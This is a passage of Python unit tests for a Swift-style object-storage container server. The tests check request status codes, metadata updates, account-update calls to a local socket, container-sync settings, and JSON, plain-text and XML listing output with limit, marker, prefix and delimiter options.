'X-Container-Meta-Test': 'Old Value'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assertEquals(resp.headers.get('x-container-meta-test'),
'New Value')
# Remove metadata header (by setting it to empty)
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(4),
'X-Container-Meta-Test': ''})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
self.assert_('x-container-meta-test' not in resp.headers)
def test_POST_invalid_partition(self):
req = Request.blank('/sda1/./a/c', environ={'REQUEST_METHOD': 'POST',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_POST_timestamp_not_float(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': 'not-float'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_POST_insufficient_storage(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'POST',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 507)
def test_POST_invalid_container_sync_to(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'POST',
'HTTP_X_TIMESTAMP': '1'},
headers={'x-container-sync-to': '192.168.0.1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_POST_after_DELETE_not_found(self):
req = Request.blank('/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '1'})
resp = req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': '2'})
resp = req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c/',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': '3'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_DELETE_obj_not_found(self):
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_DELETE_container_not_found(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'DELETE',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_PUT_utf8(self):
snowman = u'\u2603'
container_name = snowman.encode('utf-8')
req = Request.blank(
'/sda1/p/a/%s' % container_name, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
def test_account_update_mismatched_host_device(self):
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'},
headers={'X-Timestamp': '0000000001.00000',
'X-Account-Host': '127.0.0.1:0',
'X-Account-Partition': '123',
'X-Account-Device': 'sda1,sda2'})
broker = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
resp = self.controller.account_update(req, 'a', 'c', broker)
self.assertEquals(resp.status_int, 400)
def test_account_update_account_override_deleted(self):
bindsock = listen(('127.0.0.1', 0))
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1'},
headers={'X-Timestamp': '0000000001.00000',
'X-Account-Host': '%s:%s' %
bindsock.getsockname(),
'X-Account-Partition': '123',
'X-Account-Device': 'sda1',
'X-Account-Override-Deleted': 'yes'})
with save_globals():
new_connect = fake_http_connect(200, count=123)
swift.container.server.http_connect = new_connect
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
def test_PUT_account_update(self):
bindsock = listen(('127.0.0.1', 0))
def accept(return_code, expected_timestamp):
try:
with Timeout(3):
sock, addr = bindsock.accept()
inc = sock.makefile('rb')
out = sock.makefile('wb')
out.write('HTTP/1.1 %d OK\r\nContent-Length: 0\r\n\r\n' %
return_code)
out.flush()
self.assertEquals(inc.readline(),
'PUT /sda1/123/a/c HTTP/1.1\r\n')
headers = {}
line = inc.readline()
while line and line != '\r\n':
headers[line.split(':')[0].lower()] = \
line.split(':')[1].strip()
line = inc.readline()
self.assertEquals(headers['x-put-timestamp'],
expected_timestamp)
except BaseException as err:
return err
return None
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '0000000001.00000',
'X-Account-Host': '%s:%s' % bindsock.getsockname(),
'X-Account-Partition': '123',
'X-Account-Device': 'sda1'})
event = spawn(accept, 201, '0000000001.00000')
try:
with Timeout(3):
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
finally:
err = event.wait()
if err:
raise Exception(err)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': '2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '0000000003.00000',
'X-Account-Host': '%s:%s' % bindsock.getsockname(),
'X-Account-Partition': '123',
'X-Account-Device': 'sda1'})
event = spawn(accept, 404, '0000000003.00000')
try:
with Timeout(3):
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
finally:
err = event.wait()
if err:
raise Exception(err)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '0000000005.00000',
'X-Account-Host': '%s:%s' % bindsock.getsockname(),
'X-Account-Partition': '123',
'X-Account-Device': 'sda1'})
event = spawn(accept, 503, '0000000005.00000')
got_exc = False
try:
with Timeout(3):
resp = req.get_response(self.controller)
except BaseException as err:
got_exc = True
finally:
err = event.wait()
if err:
raise Exception(err)
self.assert_(not got_exc)
def test_PUT_reset_container_sync(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], -1)
self.assertEquals(info['x_container_sync_point2'], -1)
db.set_x_container_sync_points(123, 456)
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], 123)
self.assertEquals(info['x_container_sync_point2'], 456)
# Set to same value
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], 123)
self.assertEquals(info['x_container_sync_point2'], 456)
# Set to new value
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 202)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], -1)
self.assertEquals(info['x_container_sync_point2'], -1)
def test_POST_reset_container_sync(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], -1)
self.assertEquals(info['x_container_sync_point2'], -1)
db.set_x_container_sync_points(123, 456)
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], 123)
self.assertEquals(info['x_container_sync_point2'], 456)
# Set to same value
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], 123)
self.assertEquals(info['x_container_sync_point2'], 456)
# Set to new value
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'POST'},
headers={'x-timestamp': '1',
'x-container-sync-to': 'http://127.0.0.1:12345/v1/a/c2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
db = self.controller._get_container_broker('sda1', 'p', 'a', 'c')
info = db.get_info()
self.assertEquals(info['x_container_sync_point1'], -1)
self.assertEquals(info['x_container_sync_point2'], -1)
def test_DELETE(self):
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'}, headers={'X-Timestamp': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'}, headers={'X-Timestamp': '2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'GET'}, headers={'X-Timestamp': '3'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_DELETE_not_found(self):
# Even if the container wasn't previously heard of, the container
# server will accept the delete and replicate it to where it belongs
# later.
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE', 'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_DELETE_object(self):
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'}, headers={'X-Timestamp': '2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '0',
'HTTP_X_SIZE': 1, 'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'}, headers={'X-Timestamp': '3'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 409)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'}, headers={'X-Timestamp': '4'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'}, headers={'X-Timestamp': '5'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'GET'}, headers={'X-Timestamp': '6'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
def test_DELETE_account_update(self):
bindsock = listen(('127.0.0.1', 0))
def accept(return_code, expected_timestamp):
try:
with Timeout(3):
sock, addr = bindsock.accept()
inc = sock.makefile('rb')
out = sock.makefile('wb')
out.write('HTTP/1.1 %d OK\r\nContent-Length: 0\r\n\r\n' %
return_code)
out.flush()
self.assertEquals(inc.readline(),
'PUT /sda1/123/a/c HTTP/1.1\r\n')
headers = {}
line = inc.readline()
while line and line != '\r\n':
headers[line.split(':')[0].lower()] = \
line.split(':')[1].strip()
line = inc.readline()
self.assertEquals(headers['x-delete-timestamp'],
expected_timestamp)
except BaseException as err:
return err
return None
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT'}, headers={'X-Timestamp': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': '0000000002.00000',
'X-Account-Host': '%s:%s' % bindsock.getsockname(),
'X-Account-Partition': '123',
'X-Account-Device': 'sda1'})
event = spawn(accept, 204, '0000000002.00000')
try:
with Timeout(3):
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
finally:
err = event.wait()
if err:
raise Exception(err)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '2'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': '0000000003.00000',
'X-Account-Host': '%s:%s' % bindsock.getsockname(),
'X-Account-Partition': '123',
'X-Account-Device': 'sda1'})
event = spawn(accept, 404, '0000000003.00000')
try:
with Timeout(3):
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 404)
finally:
err = event.wait()
if err:
raise Exception(err)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '4'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': '0000000005.00000',
'X-Account-Host': '%s:%s' % bindsock.getsockname(),
'X-Account-Partition': '123',
'X-Account-Device': 'sda1'})
event = spawn(accept, 503, '0000000005.00000')
got_exc = False
try:
with Timeout(3):
resp = req.get_response(self.controller)
except BaseException as err:
got_exc = True
finally:
err = event.wait()
if err:
raise Exception(err)
self.assert_(not got_exc)
def test_DELETE_invalid_partition(self):
req = Request.blank(
'/sda1/./a/c', environ={'REQUEST_METHOD': 'DELETE',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_DELETE_timestamp_not_float(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
req.get_response(self.controller)
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': 'not-float'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 400)
def test_DELETE_insufficient_storage(self):
self.controller = container_server.ContainerController(
{'devices': self.testdir})
req = Request.blank(
'/sda-null/p/a/c', environ={'REQUEST_METHOD': 'DELETE',
'HTTP_X_TIMESTAMP': '1'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 507)
def test_GET_over_limit(self):
req = Request.blank(
'/sda1/p/a/c?limit=%d' %
(container_server.CONTAINER_LISTING_LIMIT + 1),
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 412)
def test_GET_json(self):
# make a container
req = Request.blank(
'/sda1/p/a/jsonc', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
# test an empty container
req = Request.blank(
'/sda1/p/a/jsonc?format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 200)
self.assertEquals(simplejson.loads(resp.body), [])
# fill the container
for i in range(3):
req = Request.blank(
'/sda1/p/a/jsonc/%s' % i, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
# test format
json_body = [{"name": "0",
"hash": "x",
"bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"},
{"name": "1",
"hash": "x",
"bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"},
{"name": "2",
"hash": "x",
"bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"}]
req = Request.blank(
'/sda1/p/a/jsonc?format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(simplejson.loads(resp.body), json_body)
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank(
'/sda1/p/a/jsonc?format=json',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/json')
for accept in ('application/json', 'application/json;q=1.0,*/*;q=0.9',
'*/*;q=0.9,application/json;q=1.0', 'application/*'):
req = Request.blank(
'/sda1/p/a/jsonc',
environ={'REQUEST_METHOD': 'GET'})
req.accept = accept
resp = req.get_response(self.controller)
self.assertEquals(
simplejson.loads(resp.body), json_body,
'Invalid body for Accept: %s' % accept)
self.assertEquals(
resp.content_type, 'application/json',
'Invalid content_type for Accept: %s' % accept)
req = Request.blank(
'/sda1/p/a/jsonc',
environ={'REQUEST_METHOD': 'HEAD'})
req.accept = accept
resp = req.get_response(self.controller)
self.assertEquals(
resp.content_type, 'application/json',
'Invalid content_type for Accept: %s' % accept)
def test_GET_plain(self):
# make a container
req = Request.blank(
'/sda1/p/a/plainc', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
# test an empty container
req = Request.blank(
'/sda1/p/a/plainc', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 204)
# fill the container
for i in range(3):
req = Request.blank(
'/sda1/p/a/plainc/%s' % i, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
plain_body = '0\n1\n2\n'
req = Request.blank('/sda1/p/a/plainc',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'text/plain')
self.assertEquals(resp.body, plain_body)
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank('/sda1/p/a/plainc',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'text/plain')
for accept in ('', 'text/plain', 'application/xml;q=0.8,*/*;q=0.9',
'*/*;q=0.9,application/xml;q=0.8', '*/*',
'text/plain,application/xml'):
req = Request.blank(
'/sda1/p/a/plainc',
environ={'REQUEST_METHOD': 'GET'})
req.accept = accept
resp = req.get_response(self.controller)
self.assertEquals(
resp.body, plain_body,
'Invalid body for Accept: %s' % accept)
self.assertEquals(
resp.content_type, 'text/plain',
'Invalid content_type for Accept: %s' % accept)
req = Request.blank(
'/sda1/p/a/plainc',
environ={'REQUEST_METHOD': 'GET'})
req.accept = accept
resp = req.get_response(self.controller)
self.assertEquals(
resp.content_type, 'text/plain',
'Invalid content_type for Accept: %s' % accept)
# test conflicting formats
req = Request.blank(
'/sda1/p/a/plainc?format=plain',
environ={'REQUEST_METHOD': 'GET'})
req.accept = 'application/json'
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'text/plain')
self.assertEquals(resp.body, plain_body)
# test unknown format uses default plain
req = Request.blank(
'/sda1/p/a/plainc?format=somethingelse',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 200)
self.assertEquals(resp.content_type, 'text/plain')
self.assertEquals(resp.body, plain_body)
def test_GET_json_last_modified(self):
# make a container
req = Request.blank(
'/sda1/p/a/jsonc', environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i, d in [(0, 1.5), (1, 1.0), ]:
req = Request.blank(
'/sda1/p/a/jsonc/%s' % i, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': d,
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
# test format
# last_modified format must be uniform, even when there are not msecs
json_body = [{"name": "0",
"hash": "x",
"bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.500000"},
{"name": "1",
"hash": "x",
"bytes": 0,
"content_type": "text/plain",
"last_modified": "1970-01-01T00:00:01.000000"}, ]
req = Request.blank(
'/sda1/p/a/jsonc?format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/json')
self.assertEquals(simplejson.loads(resp.body), json_body)
self.assertEquals(resp.charset, 'utf-8')
def test_GET_xml(self):
# make a container
req = Request.blank(
'/sda1/p/a/xmlc', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
# fill the container
for i in range(3):
req = Request.blank(
'/sda1/p/a/xmlc/%s' % i,
environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
xml_body = '<?xml version="1.0" encoding="UTF-8"?>\n' \
'<container name="xmlc">' \
'<object><name>0</name><hash>x</hash><bytes>0</bytes>' \
'<content_type>text/plain</content_type>' \
'<last_modified>1970-01-01T00:00:01.000000' \
'</last_modified></object>' \
'<object><name>1</name><hash>x</hash><bytes>0</bytes>' \
'<content_type>text/plain</content_type>' \
'<last_modified>1970-01-01T00:00:01.000000' \
'</last_modified></object>' \
'<object><name>2</name><hash>x</hash><bytes>0</bytes>' \
'<content_type>text/plain</content_type>' \
'<last_modified>1970-01-01T00:00:01.000000' \
'</last_modified></object>' \
'</container>'
# tests
req = Request.blank(
'/sda1/p/a/xmlc?format=xml',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/xml')
self.assertEquals(resp.body, xml_body)
self.assertEquals(resp.charset, 'utf-8')
req = Request.blank(
'/sda1/p/a/xmlc?format=xml',
environ={'REQUEST_METHOD': 'HEAD'})
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'application/xml')
for xml_accept in (
'application/xml', 'application/xml;q=1.0,*/*;q=0.9',
'*/*;q=0.9,application/xml;q=1.0', 'application/xml,text/xml'):
req = Request.blank(
'/sda1/p/a/xmlc',
environ={'REQUEST_METHOD': 'GET'})
req.accept = xml_accept
resp = req.get_response(self.controller)
self.assertEquals(
resp.body, xml_body,
'Invalid body for Accept: %s' % xml_accept)
self.assertEquals(
resp.content_type, 'application/xml',
'Invalid content_type for Accept: %s' % xml_accept)
req = Request.blank(
'/sda1/p/a/xmlc',
environ={'REQUEST_METHOD': 'HEAD'})
req.accept = xml_accept
resp = req.get_response(self.controller)
self.assertEquals(
resp.content_type, 'application/xml',
'Invalid content_type for Accept: %s' % xml_accept)
req = Request.blank(
'/sda1/p/a/xmlc',
environ={'REQUEST_METHOD': 'GET'})
req.accept = 'text/xml'
resp = req.get_response(self.controller)
self.assertEquals(resp.content_type, 'text/xml')
self.assertEquals(resp.body, xml_body)
def test_GET_marker(self):
# make a container
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
# fill the container
for i in range(3):
req = Request.blank(
'/sda1/p/a/c/%s' % i, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x', 'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
# test limit with marker
req = Request.blank('/sda1/p/a/c?limit=2&marker=1',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
result = resp.body.split()
self.assertEquals(result, ['2', ])
def test_weird_content_types(self):
snowman = u'\u2603'
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i, ctype in enumerate((snowman.encode('utf-8'),
'text/plain; charset="utf-8"')):
req = Request.blank(
'/sda1/p/a/c/%s' % i, environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1', 'HTTP_X_CONTENT_TYPE': ctype,
'HTTP_X_ETAG': 'x', 'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank('/sda1/p/a/c?format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
result = [x['content_type'] for x in simplejson.loads(resp.body)]
self.assertEquals(result, [u'\u2603', 'text/plain;charset="utf-8"'])
def test_GET_accept_not_valid(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c1', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Put-Timestamp': '1',
'X-Delete-Timestamp': '0',
'X-Object-Count': '0',
'X-Bytes-Used': '0',
'X-Timestamp': normalize_timestamp(0)})
req.get_response(self.controller)
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'GET'})
req.accept = 'application/xml*'
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 406)
def test_GET_limit(self):
# make a container
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
# fill the container
for i in range(3):
req = Request.blank(
'/sda1/p/a/c/%s' % i,
environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
# test limit
req = Request.blank(
'/sda1/p/a/c?limit=2', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
result = resp.body.split()
self.assertEquals(result, ['0', '1'])
def test_GET_prefix(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i in ('a1', 'b1', 'a2', 'b2', 'a3', 'b3'):
req = Request.blank(
'/sda1/p/a/c/%s' % i,
environ={
'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain',
'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c?prefix=a', environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(resp.body.split(), ['a1', 'a2', 'a3'])
def test_GET_delimiter_too_long(self):
req = Request.blank('/sda1/p/a/c?delimiter=xx',
environ={'REQUEST_METHOD': 'GET',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 412)
def test_GET_delimiter(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i in ('US-TX-A', 'US-TX-B', 'US-OK-A', 'US-OK-B', 'US-UT-A'):
req = Request.blank(
'/sda1/p/a/c/%s' % i,
environ={
'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain', 'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c?prefix=US-&delimiter=-&format=json',
environ={'REQUEST_METHOD': 'GET'})
resp = req.get_response(self.controller)
self.assertEquals(
simplejson.loads(resp.body),
[{"subdir": "US-OK-"},
{"subdir": "US-TX-"},
{"subdir": "US-UT-"}])
def test_GET_delimiter_xml(self):
req = Request.blank(
'/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT',
'HTTP_X_TIMESTAMP': '0'})
resp = req.get_response(self.controller)
for i in ('US-TX-A', 'US-TX-B', 'US-OK-A', 'US-OK-B', 'US-UT-A'):
req = Request.blank(
'/sda1/p/a/c/%s' % i,
environ={
'REQUEST_METHOD': 'PUT', 'HTTP_X_TIMESTAMP': '1',
'HTTP_X_CONTENT_TYPE': 'text/plain', 'HTTP_X_ETAG': 'x',
'HTTP_X_SIZE': 0})
resp = req.get_response(self.controller)
self.assertEquals(resp.status_int, 201)
req = Request.blank(
